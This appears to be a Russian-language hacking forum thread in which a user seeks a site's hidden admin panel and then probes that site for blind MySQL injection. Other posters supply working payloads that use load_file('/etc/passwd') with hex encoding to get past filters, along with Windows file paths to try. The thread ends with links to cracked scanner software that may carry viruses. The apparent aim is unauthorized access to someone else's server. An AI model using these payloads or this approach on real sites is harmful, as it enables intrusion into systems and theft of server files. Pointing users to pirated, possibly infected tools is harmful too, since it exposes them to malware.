Просмотр полной версии : Помощь в поиске админки
Привет всем. Нужна помощь в поиске админки. Искал 2мя тулзами но результата 0.
Подскажите онлайн ресурс какой или софт, или может приватно кто-нибудь поможет?
nikto
dirb
dirs3arch
dnsmap (поддомены)
+ fuzz.txt https://bo0om.ru/fuzz.txt
+ listpath.txt https://yarbabin.ru/stuff/listpath.txt
Может быть такое, что получить удалённый доступ к админке невозможно?
↑ (https://antichat.live/posts/3878382/)
Может быть такое, что получить удалённый доступ к админке невозможно?
Да, если, например, доступ разрешен только с определенных ip\диапазонов ip, либо по специальному user-агенту, и.т.д. Точнее получить-то его возможно, но весьма затруднительно.
А где можно почитать про такие случаи поподробнее? Хочу доделать то что начал до конца)
И ещё вопрос (сори что не по теме) можно ли провести проверку на чтение/запись файлов через MySql Inj, если стоит фильтр на UNION (Все известные мне способы обхода фильтра я, естественно, попробовал).
↑ (https://antichat.live/posts/3878414/)
И ещё вопрос (сори что не по теме) можно ли провести проверку на чтение/запись файлов через MySql Inj, если стоит фильтр на UNION (Все известные мне способы обхода фильтра я, естественно, попробовал).
and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+
↑ (https://antichat.live/posts/3878422/)
and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+
Тоесть если есть возможность загрузки то при:
site.ru/index.php?id=1 and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+
Выведет то же самое что и при:
site.ru/index.php?id=1
Я правильно понимаю?
is NULL и is not NULL - во втором случае получите TRUE, если есть права
Проверяю данные запросы в консоли
SELECT 1 AND 1=if(load_file('/etc/passwd') is not NULL,1,2); Возвращает 1.
SELECT 1 AND 1=if(load_file('/etc/passwd') is NULL,1,2); Возвращает 0.
Но когда подставляю на сайте что в первом, что во втором случае отображается то же самое, что и при: site.ru/index.php?id=1
Но если делаю так: site.ru/index.php?id=1 and 1=0--+
Возвращает пустую страницу.
Это значит что нет прав на загрузку файла?
Может я что-то делаю не так?=\
может что-то не так. может кавычки у вас экранируются, может /etc/passwd блокирует WAF, или еще что-то. но результаты при этих запросах должны отличатся вне зависимости от того, есть права или нет.
Теперь такой запроc: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ Возвращает пустую страницу.
Может сервер на винде...
yarbabin,Спасибо огромное за помощь буду дальше пытаться ковырять
и толку что вы спрятали слово в кавычках в хекс и анхекс? load_file(0x2f6574632f706173737764)
Но теперь хотя бы есть результат)
При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is NULL,1,2)--+ отображается как и при site.ru/index.php?id=1
а при AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ пустая страница.
То же самое и при and 1=if(load_file(0x2f6574632f706173737764) is not NULL,1,2)--+
и
and 1=if(load_file(0x2f6574632f706173737764) is NULL,1,2)--+
просто под рукой сейчас нчего нет что в хекс кодирует строку)
↑ (https://antichat.live/posts/3878901/)
При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd')))
is NULL
,1,2)--+ отображается как и при site.ru/index.php?id=1
а при AND 1=if(load_file(unhex(hex('/etc/passwd')))
is not NULL
,1,2)--+ пустая страница.
and 1=1 TRUE
and 1=2 FALSE
Соответственно, load_file(unhex(hex('/etc/passwd')) возвращает null, у вас нет прав на чтение.
Это я понял. Просто думаю если серв на винде то путь другой будет. Сейчас времени нет тестить (не дома нахожусь).
Под вендой в консоли при запросе select 1 and 1=if(load_file('/etc/passwd') is not NULL,1,2); вернётся false так как такого пути не существует.
↑ (https://antichat.live/posts/3878915/)
Это я понял. Просто думаю если серв на винде то путь другой будет. Сейчас времени нет тестить (не дома нахожусь).
Под вендой в консоли при запросе select 1 and 1=if(load_file('/etc/passwd') is not NULL,1,2); вернётся false так как такого пути не существует.
C:\boot.ini
C:\Windows\System32\drivers\etc\hosts
Короче нет там прав на чтение. Всем спасибо. Пойду думать дальше.
comstream
12.08.2015, 17:31
Aqunetix - клёвый софт для этого. Но бывает сайту тупо состоит из набора html статических страниц и там просто нет админики )))
↑ (https://antichat.live/posts/3879342/)
Aqunetix - клёвый софт для этого. Но бывает сайту тупо состоит из набора html статических страниц и там просто нет админики )))
Acunetix он пишется https://www.acunetix.com/
Можно ссылочку на фулл версию?)
hahanovB
15.08.2015, 21:34
↑ (https://antichat.live/posts/3880541/)
Можно ссылочку на фулл версию?)
Держи http://rutracker.org/forum/viewtopic.php?t=4930387
Последняя версия http://www.52pojie.cn/thread-377625-1-1.html ИЛИ http://mytestvps.com/wordpress/acunetix-web-vulnerability-scanner-10-cracked-version-download.html ИЛИ http://www.freebuf.com/tools/71091.html - я не проверял возможно есть вирусы...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot